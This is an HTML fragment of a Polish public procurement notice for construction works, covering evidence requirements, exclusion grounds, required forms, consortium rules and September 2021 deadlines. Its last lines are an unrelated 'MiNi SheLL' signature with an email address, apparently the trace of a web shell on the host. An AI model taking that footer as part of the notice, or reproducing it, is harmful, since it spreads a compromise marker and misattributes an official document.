do warunków udziału w postępowaniu dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty<br/>budowlane lub usługi, których wskazane zdolności dotyczą.<br/>2.5 Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające<br/>zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna,<br/>pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu,<br/>a także zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które<br/>zostały przewidziane względem wykonawcy.<br/>2.6 Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z<br/>wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę<br/>poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba<br/>że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>2.7 Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu<br/>udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału<br/>w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający<br/>żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot<br/>innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału<br/>w postępowaniu.<br/>2.8 Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał<br/>on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <br/>3. Regulacje dotyczące podwykonawstwa zostały określone w rozdziale 19 pkt 4 SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.W celu potwierdzenia braku podstaw wykluczenia wykonawcy, zamawiający żąda:<br/>a) oświadczenie wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył<br/>odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór<br/>stanowi Załącznik nr 9 do SWZ);b) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp<br/>sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem;<br/>c) oświadczenie o aktualności informacji zawartych w oświadczeniu złożonym wraz z<br/>ofertą (wzór stanowi Załącznik nr 10 do SWZ)2. Dokumenty wykonawcy, który ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej:<br/>2.1 zamiast dokumentu, o którym mowa w pkt 1.1 ppkt b) składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkani,<br/>potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego<br/>działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju<br/>sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia<br/>tej procedury. Dokument ten powinien być wystawiony nie wcześniej niż 3 miesiące przez<br/>jego złożeniem.<br/>2.2 Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje<br/>się dokumentów, o których mowa w pkt 2.1 zastępuje się je odpowiednio w całości lub w<br/>części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby lub osób uprawnionych do jego reprezentacji, lub oświadczenie osoby,<br/>której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniach<br/>pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem,<br/>organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania wykonawcy.3. Dokumenty Podwykonawców:<br/>3.1 jeżeli wykonawca powołuje się na Podwykonawcę niebędącego podmiotami<br/>udostępniającymi zasoby na zasadach określonych w art. 118 ustawy Pzp zamawiający<br/>żąda przedstawiania przez wykonawcę dokumentów potwierdzających, że nie zachodzą<br/>wobec tego podwykonawcy podstawy wykluczenia z postępowania, o których mowa w pkt<br/>1.1. 4. Dokumenty podmiotów udostępniających zasoby:<br/>4.1 jeżeli wykonawca powołuje się na podmioty udostępniające zasoby na zasadach<br/>określonych w art. 118 ustawy Pzp zamawiający żąda przedstawiania przez wykonawcę <br/>dokumentów potwierdzających, że nie zachodzą wobec tych podmiotów podstawy<br/>wykluczenia z postępowania, o których mowa w pkt 1.1.<br/>5. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki<br/>dowodowe nie są już aktualne, zamawiający może w każdym czasie wezwać wykonawcę do<br/>złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień<br/>ich złożenia.<br/>6. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je<br/>uzyskać za pomocą bezpłatnych ogólnodostępnych baz danych, w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne, o ile wykonawca wskazał dane umożliwiające<br/>dostęp do tych środków.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">w celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>dotyczących sytuacji ekonomicznej i finansowej oraz zdolności technicznej lub<br/>zawodowej, zamawiający żąda:<br/>a) dokumentów potwierdzających, że wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę gwarancyjną ubezpieczenia 150 000,00 PLN,<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami (wzór stanowi Załącznik nr 8<br/>do SWZ);<br/>c) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego<br/>nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (Wzór<br/>tabeli – wykaz robót budowlanych stanowi załącznik nr 7 do SWZ, do którego należy<br/>dołączyć dowody)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1 formularz ofertowy – do przygotowania oferty zaleca się wykorzystanie Formularza<br/>ofertowego, którego wzór stanowi Załącznik nr 1 do SWZ. W przypadku, gdy<br/>Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty<br/>należy zamieścić wszystkie wymagane informacje;<br/>2 kosztorys ofertowy - którego wzór stanowi Załącznik nr 2 do SWZ.<br/>3 oświadczenie o niepodleganiu wykluczeniu, którego wzór stanowi Załącznik nr 3 do<br/>SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców. W przypadku<br/>powoływania się na zasoby innych podmiotów oświadczenie o niepodleganiu<br/>wykluczeniu podpisuje podmiot udostępniający zasoby lub jego pełnomocnik w zakresie,<br/>w jakim wykonawca powołuje się na jego zasoby;<br/>4 oświadczenie o spełnianiu warunków zamówienia, którego wzór stanowi Załącznik nr 4<br/>do SWZ. W przypadku powoływania się na zasoby innych podmiotów oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu podpisuje podmiot udostępniający zasoby<br/>lub jego pełnomocnik w zakresie, w jakim wykonawca powołuje się na jego zasoby;<br/>5 oświadczenie, złożone na formularzu ofertowym (Załącznik nr 1 do SWZ), z którego<br/>będzie wynikało, które roboty budowlane wykonają poszczególni Wykonawcy składający<br/>ofertę wspólnie;<br/>6 Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik.<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie,<br/>jak składana oferta (t. j. w formie elektronicznej lub postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie<br/>elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie<br/>pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97<br/>§ 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie<br/>notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez<br/>opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy.<br/>Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez<br/>upełnomocnionego; <br/>7 Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>8 Zobowiązanie podmiotu udostępniającego swoje zasoby – zgodnie z Załącznikiem nr 5<br/>do SWZ – jeżeli wykonawca powołuje się na zasoby; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 Wykonawcy mogą wspólnie (np. konsorcjum, spółka cywilna) ubiegać się o udzielenie<br/>zamówienia. Wówczas wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. <br/>2 Zamawiający nie może wymagać od wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiadania określonej formy prawnej w celu złożenia oferty.<br/>3 Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>4 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą<br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub<br/>usługi, do realizacji których te zdolności są wymagane.<br/>5 W przypadku, o którym mowa w pkt 3.4 wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia wypełniają na formularzu oferty pkt 5, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian został omówiony w paragrafie 16 ust. 5,6, 7 Projektowanych postanowień umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika systemu dostępnej na https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-10 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako<br/>tajemnicę przedsiębiorstwa, w celu utrzymania w poufności tych informacji, Wykonawca<br/>przekaże je wydzielone i odpowiednio oznaczone „Załącznik stanowiący tajemnicę<br/>przedsiębiorstwa”, a następnie wraz z plikami stanowiącymi jawną część skompresowane do<br/>jednego pliku archiwum (.zip). Wykonawca zobowiązany jest, wraz z przekazaniem tych<br/>informacji, wykazać spełnienie przesłanek określonych w art. 11 ust. 2 ustawy z dnia 16<br/>kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Zaleca się, aby uzasadnienie<br/>zastrzeżenia informacji jako tajemnicy przedsiębiorstwa było sformułowane w sposób<br/>umożliwiający jego udostępnienie. Zastrzeżenie przez Wykonawcę tajemnicy przedsiębiorstwa<br/>bez uzasadnienia, będzie traktowane przez Zamawiającego jako bezskuteczne ze względu na<br/>zaniechanie przez Wykonawcę podjęcia niezbędnych działań w celu zachowania poufności<br/>objętych klauzulą informacji zgodnie z postanowieniami art. 18 ust. 3 ustawy Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com